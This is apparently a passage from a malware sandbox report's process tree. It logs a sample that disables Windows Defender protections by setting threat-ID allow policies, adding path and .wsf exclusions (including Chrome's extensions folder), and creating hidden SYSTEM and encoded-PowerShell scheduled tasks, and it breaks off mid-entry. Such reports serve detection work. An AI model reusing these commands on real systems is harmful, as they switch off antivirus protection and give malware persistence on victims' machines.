                                                                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                            3⤵
                                                                                                              PID:2692
                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                4⤵
                                                                                                                  PID:1752
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                    5⤵
                                                                                                                      PID:888
                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                        6⤵
                                                                                                                          PID:636
                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                      4⤵
                                                                                                                        PID:856
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                          5⤵
                                                                                                                            PID:2668
                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                              6⤵
                                                                                                                                PID:2632
                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                            4⤵
                                                                                                                              PID:2720
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                5⤵
                                                                                                                                  PID:2168
                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                    6⤵
                                                                                                                                      PID:3028
                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                  4⤵
                                                                                                                                    PID:2932
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                      5⤵
                                                                                                                                        PID:884
                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                          6⤵
                                                                                                                                            PID:2352
                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                        4⤵
                                                                                                                                          PID:2520
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                            5⤵
                                                                                                                                              PID:2340
                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                6⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                PID:1448
                                                                                                                                                • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                  7⤵
                                                                                                                                                    PID:2584
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 00:00:10 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\Lmbvdhb.exe\" GH /QsCedidmd 385118 /S" /V1 /F
                                                                                                                                            3⤵
                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                            PID:268
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /run /I /tn "XyyyteIMwZeutaZuw"
                                                                                                                                            3⤵
                                                                                                                                              PID:2220
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\MhOYRXL.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\MhOYRXL.exe it /JHHdidHlvL 385118 /S
                                                                                                                                            2⤵
                                                                                                                                              PID:1660
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                3⤵
                                                                                                                                                  PID:1644
                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                    4⤵
                                                                                                                                                      PID:1812
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                        5⤵
                                                                                                                                                          PID:2896
                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                            6⤵
                                                                                                                                                              PID:2412
                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                          4⤵
                                                                                                                                                            PID:924
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                              5⤵
                                                                                                                                                                PID:2796
                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:1724
                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:908
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:2704
                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:1864
                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:2724
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:1964
                                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:1648
                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:1980
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:2320
                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                    PID:2624
                                                                                                                                                                                    • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                      7⤵
                                                                                                                                                                                        PID:568
                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                schtasks /CREATE /TN "gTzhxcKrv" /SC once /ST 01:42:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                PID:2844
                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                schtasks /run /I /tn "gTzhxcKrv"
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:1200
                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                  schtasks /DELETE /F /TN "gTzhxcKrv"
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:344
                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:1688
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:2848
                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                            PID:1888
                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:2140
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:2436
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:576
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:1280
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:844
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:1088
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:1272
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:2448
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:2684
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          cmd /C copy nul "C:\Windows\Temp\WPGfhLqOzAIwKSwi\eWEszJzz\BuFzfBLrQNBPmQmJ.wsf"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:2788
                                                                                                                                                                                                          • C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                            wscript "C:\Windows\Temp\WPGfhLqOzAIwKSwi\eWEszJzz\BuFzfBLrQNBPmQmJ.wsf"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:2032
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:268
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:1428
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:1536
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:1608
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:2424
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:944
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:3028
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                PID:2056
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:2444
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:2584
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VyWMmqtuSNndeGVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:1148
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VyWMmqtuSNndeGVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:2180
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                          PID:1952
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                            PID:1112
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                              PID:1248
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                PID:776
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                  PID:1900
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:2168
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                      PID:1288
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:1692
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:440
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                            PID:844
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                              PID:956
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:760
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                  PID:2436
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:2672
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                      PID:1280
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
